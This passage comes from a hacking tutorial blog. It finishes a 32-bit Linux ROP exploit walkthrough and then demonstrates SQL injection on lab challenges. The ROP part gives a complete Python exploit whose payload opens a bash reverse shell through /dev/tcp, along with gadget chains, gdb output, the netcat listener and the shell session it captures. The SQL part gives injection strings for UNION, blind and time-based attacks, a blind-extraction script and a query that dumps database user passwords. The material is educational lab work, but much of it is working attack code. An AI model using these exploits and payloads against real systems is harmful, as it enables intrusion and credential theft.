I calculated the addresses from the value stored at the address that ecx points to (the address of the first pointer that we wrote earlier).

On line 18 I instruct gdb to display the value of ecx, I then use the examine command to display the string at the address contained there.

I then add 18 (the number of bytes until the -c string) and display that string and add another 6 (the number of bytes from that point to the next string) to display the last string.

Writing The Remaining Pointers

As with the code we just wrote I will not go through every step as the method I will use is the same.

I will be working out the address of the first pointer that I need to change (firstly being the pointer to the -c argument string) using eax and ebx and using edx as the point of reference.

I will then be putting that address into edx, working out the address of the string that that pointer should be pointing to using the same method (which stores the address in eax) and then writing the value that eax contains into the address pointed to by edx.

There are 2 pointers that we need to do this for, the pointer to -c and the pointer to the long string (the actual reverse shell).

If you've fully understood the post so far, this should be a reasonably trivial task.

Here is the section of my notes that do this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaa6a : (0xaaaaaaaa - 64) = distance from edx to -c arg pointer
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to -c arg pointer from edx
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains address of -c arg pointer
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now edx contains address of -c arg pointer
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaa70 : (0xaaaaaaaa - 58) = distance from edx to -c arg string
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to -c arg string
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the address of -c arg string
0x08083f21 : mov dword ptr [edx], eax ; ret
---------------------------------------------------- now the -c arg pointer contains the address of -c string
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaaa6 : (0xaaaaaaaa - 4) = distance from edx to third arg pointer
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to the third pointer
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- eax contains the address of third pointer
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- edx contains the address of third pointer
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaa72: (0xaaaaaaaa - 56) = distance from edx to third arg string
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to the third string
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- eax contains the address of third string
0x08083f21 : mov dword ptr [edx], eax ; ret
---------------------------------------------------- third pointer contains address of third string

Now all of the pointers should point to the correct strings.

It's time to test it again, I will be using the same breakpoint trick I used last time:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/appuser/app-net 
0xbfffea38: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffea48: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffea58: 0x41414141  0x41414141
=> 0x808456c <_dl_get_origin+28>:   mov    ecx,esi

Breakpoint 4, 0x0808456c in _dl_get_origin ()
5: /x $ecx = 0xbfffeb74
4: /x $edx = 0xbfffeb7c
3: /x $ebx = 0xeeeeeeee
2: /x $eax = 0xbfffeb44
1: /x $ebp = 0xeeeeeeee
(gdb) x/4xw 0xbfffeb74
0xbfffeb74: 0xbfffeb2c  0xbfffeb3e  0xbfffeb44  0x00000000
(gdb) x/s 0xbfffeb2c
0xbfffeb2c:  "////bin/bash"
(gdb) x/s 0xbfffeb3e
0xbfffeb3e:  "-c"
(gdb) x/s 0xbfffeb44
0xbfffeb44:  "/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1"

Great, so that worked perfectly.

Setting Up The Rest Of The Registers And Inserting The Last Of The Gadgets

We now have everything setup except for the values of the eax, ebx and edx registers.

edx just needs to point to 1 of the nulls that we wrote, ebx should contain the address of the ////bin/bash string and eax should contain the value 11.

We will deal with edx first because we have to use ebx and eax afterwards.

We will then calculate the address that needs to go into ebx.

Lastly we will get 11 into eax and finally run int 0x80.

Here are my full finished notes.

Finishing The Exploit And Testing It

Now that we've got the full size of the exploit we can calculate the size of our code and recalculate the distance from the address that we first receive to our data.

I done this using a python script with all of the gadgets in, you can find that script here.

This shows us that the distance is 908 bytes and not 1000 bytes.

To recalculate this we do the sum 0xaaaaaaaa - (908 + 88) = 0xaaaaa6c6, so this is the new value that we need to pop into ebx at the start of our application to calculate the first address.

Now we have finished writing the exploit:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
#!/usr/bin/env python

import socket

payload = "A" * 532

payload += "\x5a\x71\x07\x08" # ebp = esp

payload += "\xd0\x25\x05\x08" # xchg eax, ebp

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Work out the distance to the end of the payload

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\xc6\xa6\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xab\x32\x07\x08" # eax += ebx
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Write 0 to the end of the data

payload += "\x0f\x9c\x09\x08" # eax = 0

payload += "\x21\x3f\x08\x08" # [edx] = eax = 0

############### Work out the distance to 0xbbbbbbbb

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x9e\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= 12) distance to 0xbbbbbbbb
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of 0xbbbbbbbb)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Move address value into ecx

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0f\x9c\x09\x08" # eax = 0

payload += "\x21\x3f\x08\x08" # [edx] = eax = 0

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xa2\xdc\x04\x08" # ecx = eax
payload += "\xee\xee\xee\xee"

############### Work out the distance to ////bin/bash string

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x62\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= distance to string)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Work out the address of ////bin/bash string and write to pointer

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of string)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x21\x3f\x08\x08" # [edx] = eax

############### Work out the distance to null termination of last string

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\xa6\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx
payload += "\xee\xee\xee\xee" # (= distance to last string termination)
payload += "\xee\xee\xee\xee"

############### Work out the address of null termination of last string

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of string)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Write nulls to that address

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0f\x9c\x09\x08" # eax = 0

payload += "\x21\x3f\x08\x08" # [edx] = eax = 0

############### Work out the address to -c string termination from edx

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x7a\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= 48) distance to -c termination
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of -c termination)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Write nulls to -c termination

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0f\x9c\x09\x08" # eax = 0

payload += "\x21\x3f\x08\x08" # [edx] = eax = 0

############### Calculate the address of the last null termination

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\xa2\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= 8) distance to last termination
payload += "\xee\xee\xee\xee" # from edx
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of last termination)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Write nulls to last termination

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0f\x9c\x09\x08" # eax = 0

payload += "\x21\x3f\x08\x08" # [edx] = eax = 0

############### Work out the address of the -c pointer and store in edx

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x6a\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= 8) distance to -c pointer
payload += "\xee\xee\xee\xee" # from edx
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xab\x32\x07\x08" # eax += ebx (= address of -c pointer)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Work out the address of the -c string and write it

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x70\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= 58) distance to -c string
payload += "\xee\xee\xee\xee" # from edx
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of -c string)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x21\x3f\x08\x08" # [edx] = eax = 0

############### Work out the address of the last string pointer


payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\xa6\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= 4) distance to last pointer
payload += "\xee\xee\xee\xee" # from edx
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xab\x32\x07\x08" # eax += ebx (= address of last pointer)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Work out the address of the last string and write it

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x72\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= 56) distance to last string
payload += "\xee\xee\xee\xee" # from edx
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of last string)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x21\x3f\x08\x08" # [edx] = eax

############### Work out the address of the nearest nulls to edx
############### and store in edx

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x9e\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= 12) distance to nearest nulls
payload += "\xee\xee\xee\xee" # from edx
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of nearest nulls)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Work out the address of the /bin/bash string
############### and store in ebx

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x66\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= 68) distance to /bin/bash string
payload += "\xee\xee\xee\xee" # from edx
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of /bin/bash string)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Calculate 11 into eax and initialize syscall

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xf4\xff\xff\x81" # (0x81ffffe9 + 11) 11 = execve syscall number

payload += "\xcc\xa1\x0a\x08" # eax -= 0x81ffffe9

payload += "\x0d\x8c\x04\x08" # int 0x80

##################### DATA #####################

payload += "////bin/bash"
payload += "\xff\xff\xff\xff"

payload += "\xff\xff" + "-c"
payload += "\xff\xff\xff\xff"

payload += "/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1"
payload += "\xff\xff\xff\xff"

payload += "\xbb\xbb\xbb\xbb" # pointer to ////bin/bash
payload += "\xcc\xcc\xcc\xcc" # pointer to -c
payload += "\xdd\xdd\xdd\xdd" # pointer to args
payload += "\xff\xff\xff\xff"

# create the tcp socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# connect to 127.0.0.1 port 9999
s.connect(("127.0.0.1", 9999))

# send our payload
s.send(payload)

# close the socket
s.close()

Firstly we need to start netcat listening on port 8000 to catch the reverse shell:

1
testuser@dev:~$ nc -l -p 8000

Now we should launch the vulnerable application (notice I'm using a different user to make it more obvious when the exploit works):

1
appuser@dev:~$ ./app-net

Lastly we need to launch the exploit and watch the terminal that we are running netcat in:

1
testuser@dev:~$ python app-net-rop-exploit.py

Now looking at the terminal with netcat running and test by running some commands:

1
2
3
4
5
6
7
8
9
appuser@dev:/home/appuser$ pwd
pwd
/home/appuser
appuser@dev:/home/appuser$ whoami
whoami
appuser
appuser@dev:/home/appuser$ ls app-net
ls app-net
app-net

PWNED!!! :-D

Conclusion

It's important to realise that this exploit will not work against any other application, and might not even work with the same application run in a different environment (ie. on a different kernel version) or compiled with a different compiler or compiler version.

This is why it's so important to get as much information about the target environment as possible before developing an exploit for it.

That said, if you have understood this post you should now be able to develop a ROP exploit for any application on a 32 bit Linux system and beat both ASLR and NX, you just have to use the methodology we used here.

A bit of creativity needs to be used to create 1 of these exploits.

Happy Hacking :–)

Further Reading

I've not actually read anything relevant to ROP exploitation just simple explainations for how it works.

SQL Injections

Here I will demonstrate how to detect different SQL injection vulnerabilities and how to perform a few different SQL injection types using applications that are vulnerable to a second order SQL injection and 2 different blind SQL injection attacks.

The first I will look at is the second order SQL injection. A second order SQL injection happens when a user input is stored in the database but then later that input is retrieved and used in a different SQL query, its this second SQL query that is vulnerable to SQL injection.

Second Order SQL Injection

The application I will be testing is a challenge at securitytube's SQLi labs, challenge 13, here is challenge from the documentation:

As you can see we are told very little about the application and there are no rules, we just have to find the admin password and login as the admin.

Detection

First we have to look at the application by using it. When we visit the URL in the challenge we get:

By filling out the form and clicking the register me! button we get:

It looks like there is a login page too:

After logging in with the account we have just created we see the following:

So let's try using the classic single quote (') technique to see if anything different happens:

As you can see nothing different about the user account creation process, let's login with this new account:

You can see that the email address is no longer given. We can guess that the username is used in another query to retreive the email address after login and then presented to the user.

Confirmation

Now that we have a suspected SQL injection we need to confirm that it is infact an SQL injection vulnerability.

1 way to do this is by sending a syntactically correct query which is functionally the same as 1 which we know the result of.

To do this we need to guess the query being run, from what we know so far we can guess that the query is something like:

1
SELECT * FROM users WHERE username='[injection point]'

We also know a good username (foobar) and the resulting email address ([email protected]).

For the known good username the query would look something like:

1
SELECT * FROM users WHERE username='foobar'

We can inject foo' 'bar as the username and it would be functionally the same and should result in the same email address being returned.

So the resulting query would look something like:

1
SELECT * FROM users WHERE username='foo' 'bar'

The above will work for MySQL databases but not MSSQL, Oracle or others so this is 1 way we can determine the database software that is in use.

If this doesn't work we could try putting a + inbetween the 2 strings for MSSQL or || for Oracle.

If we also make sure that the email address is different ([email protected]):

We will know if the injection has worked based on the value of the email address that we get back once we log in:

So it worked! Instead of getting back the email address that we registered with we got back the email address of the other account (foobar).

This means that there is almost definitely an exploitable SQL injection vulnerability and it also means we are very likely communicating with a MySQL database.

Exploitation

For exploitation here we are probably need to use a UNION based injection.

The UNION statement allows us to combine the result set of 2 or more SELECT statements.

However, before we can concentrate on exploitation we need to know the number of columns returned in the original query.

1 way we can figure this out by using the ORDER BY keyword.

First we order by 1, this will sort by the first column, so we inject foobar' order by 1 --:

That worked because we received the email address meaning that there is at least 1 column returned, notice that we appended -- after the injection to comment out the rest of the query (the remaining single quote '), so the full query would look something like this:

1
SELECT * FROM users WHERE username='foobar' order by 1 -- '

Now we try ordering by 2 (or the second column):

Here we received no email address meaning that the original query is only returning 1 column, so the query probably looks more like this:

1
SELECT email FROM users WHERE username='foobar' order by 2 -- '

Now that we know the number of columns we can concentrate on the exploitation.

There is 1 more thing we need to do before inserting our UNION statement because the application will probably only return 1 entry from the result set, but we can test this by injecting something that will return more than 1 result:

So it only returned the email address meaning that only the first result is output to the page.

We can fix this by invalidating the first statement by inserting an always false statement after an AND and then inserting our UNION statement after that.

The resulting query will look something like this:

1
SELECT email FROM users WHERE username='foobar' AND 1=0 UNION SELECT CONCAT(@@version,' | ',database(),' | ',current_user()) -- '

Here I am concatenating the output of @@version (which displays the version of the server software), database() (which displays the name of the current database) and current_user() (which displays the current user that the web server is logged into the database):

So the name of the database is 2ndorder, we need this information to solve the challenge.

Concatenation is needed because we only have 1 field where we can return data, but you will see that, even though we only have 1 field, we can use this to return a large amount of data.

We will now use the information found in the previous query to learn the schema of the database.

We will use the information_schema database to find the schema and GROUP_CONCAT to concatenate the rows together:

As you can see, we now have the names of every table and every column in the 2ndorder database.

Now its trivial to get the admin password:

And finally logging in as admin to complete the challenge:

Content-based Blind SQL Injection

The second injection I will demonstrate is a content-based blind SQL injection.

A blind SQL injection is an SQL injection but where the result of the queries aren't output to the page.

What makes it content-based is that the page can be controlled in some manner.

For this I will be looking at challenge 5:

I will not solve the whole of this challenge here but get to a point where its trivial to solve it.

Detection

So we start like normal and use the application, here is the page you see when you load the website:

If we click Submit we get this:

So it looks like it tells us whether or not there were results returned by the query that runs in the background.

As normal we should add a single quote (') to see if we get a reaction:

Confirmation

So the job_title field might be vulnerable to SQL injection but we can try to confirm this using string concatenation, as we did before:

So we got the same result as the original query which strongly suggests that we have an SQL injection here.

Exploitation

This is pretty easy to exploit but we need to use a conditional statement.

We could use CASE but in this case we'll use IF.

This exploit could be made more efficient but I'll demonstrate that in the next example.

For now we'll determine the result byte-by-byte in a sequential manner.

First let's guess at what the actual query looks like:

1
SELECT * from employees where job_title='[injection point]'

What we want to do, based on our findings, is search through a string character by character and normally return no results but if we find the right character then return results.

We can use SUBSTR to search through a string, so if we create a query similar to this:

1
SELECT * from employees where job_title='Project Manager' AND IF((SUBSTR(current_user(), [i], 1)='[c]'),1,0) -- '

This checks the character at position i from the string returned by current_user() against the character c, if they are equal, it returns 1, making the query true and returning results, otherwise it returns 0, making the query false and not returning any results.

This way we will get a different page if the character c is correct than we will if the character is incorrect.

I've found that we can run into problems when we do it this way, the solution is to convert the character into its ascii decimal equivalent using the ASCII function and compare that with a number.

So it ends up like this:

1
SELECT * from employees where job_title='Project Manager' AND IF((ASCII(SUBSTR(current_user(), [i], 1))=[c]),1,0) -- '

Where i is the position as before but c is a numerical representation of a character that we are testing for.

Once we find the right value for c, we increment i and start again, until we've iterated through our whole character set and not found a match which means we've reached the end of the string.

So if the character matches, the page will return results otherwise it will not.

Using this information it is trivial to write a script that uses this technique to find out the current user of the database:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#!/usr/bin/env python

import urllib2, string, sys

max = 20

baseurl = "http://192.168.2.11/sqli/sql5/search.php?job_title=Project+Manager%27+and+if%28%28ascii%28substr%28current_user%28%29,"

l = list(string.printable)

try:
    basehtml = urllib2.urlopen("http://192.168.2.11/sqli/sql5/search.php?job_title=%27").read()
except:
    print "dead"
    sys.exit(-1)

for i in range(max):
    newurl = baseurl + str(i+1) + ",1%29%29="
    found = False
    for c in l:
        url = newurl + str(ord(c)) + "%29,1,0%29+--+"
        try:
            html = urllib2.urlopen(url).read()
            if basehtml != html:
                sys.stdout.write(c)
                found = True
                break
        except:
            pass
    if not found:
        break

print ''

You can use this to retrieve any data from the database by just changing current_user() to the query that returns the data that you want, for instance:

1
(select group_concat(concat(User, ' : ', Password) separator ' | ') from mysql.users)

But bare in mind the more data you try to retrieve, the longer it will take.

Time-based Blind SQL Injection

Lastly I want to demonstrate a time-based injection.

A time-based injection is where the attacker injects a time delay into the query based on a condition and determines the result of the condition based on the time is took for the page to return.

For this I will use challenge 10:

This challenge can also be completed using a content-based approach but I will ignore that and use purely a time-based approach.

A time-based attack generally works where others might fail but it takes the longest so depending on the amount of data you want to retrieve, it might not be viable.

1 advantage of a time-based attack rather than the content-based attack that we performed in the last demonstration is that the time-based approach doesn't generate database errors, meaning it has less chance of being noticed.

Detection

So let's first look at the application:

So it looks like some sort of sorting page. We seem to have 3 options (Id, First Name and Surname).

Clicking the Submit Query button gives us:

So its sorted the returned values by the Id field, but this request was a post request so to look at the request properly we need another piece of software.

Anytime I am analysing a web application, I always have my browser setup to go through Burp Suite.

Burp Suite is an intercepting proxy which has a huge number of features and IMO is an absolute must when doing any web hacking.

Looking at the request in Burp, we see:

We can guess that the query that is being run in the background is something like:

1
SELECT id, first_name, last_name FROM employees ORDER BY [injection point]

The actual application gives us different results depending on our input, we have 1 result for each field (id, first_name and last_name) and 1 result for an error (the following page was generated by inserting a single quote (') in the sort_results field):

So we could actually test for 4 different possibilities with a single request, to do this we could inject the following conditional statement:

1
2
3
4
5
case when ascii(substr(current_user(),1,1))=100 then Id
when ascii(substr(current_user(),1,1))=101 then first_name
when ascii(substr(current_user(),1,1))=102 then last_name
else (select table_name from information_schema.columns where
table_name = (select table_name from information_schema.columns)) end

Here we are checking the first character for current_user() against 100 (d), 101 (e) and 102 (f).

If it is a d then the results will be sorted by the Id field, if it is a e they will be sorted by the first_name field, if it is a f they will be sorted by the last_name field and if it isn't any of those 3 then the query will fail and we will get the same page as when we entered the single quote.

But we are going to ignore this and imagine that the application never returns anything, just some generic page.

If this was the case the only option we have is time-based.

To test this all we have to do in this situation is inject sleep(5), if the application is vulnerable the page will take longer to return.

In other situations we might need to try injecting + sleep(5), ' + sleep(5) --, ' + sleep(5) + ', ' union select sleep(5) --, ' union select null, sleep(5)# and so on...

But this application does delay with the simple sleep(5) injected.

Exploitation

Now we can use the information we have already to inject a conditional statement that only delays when we've found the correct character of a string.

Our injection will look something like this:

1
case when ascii(substr(current_user(), 1, 1))=100 then sleep(5) else 0 end

Or:

1
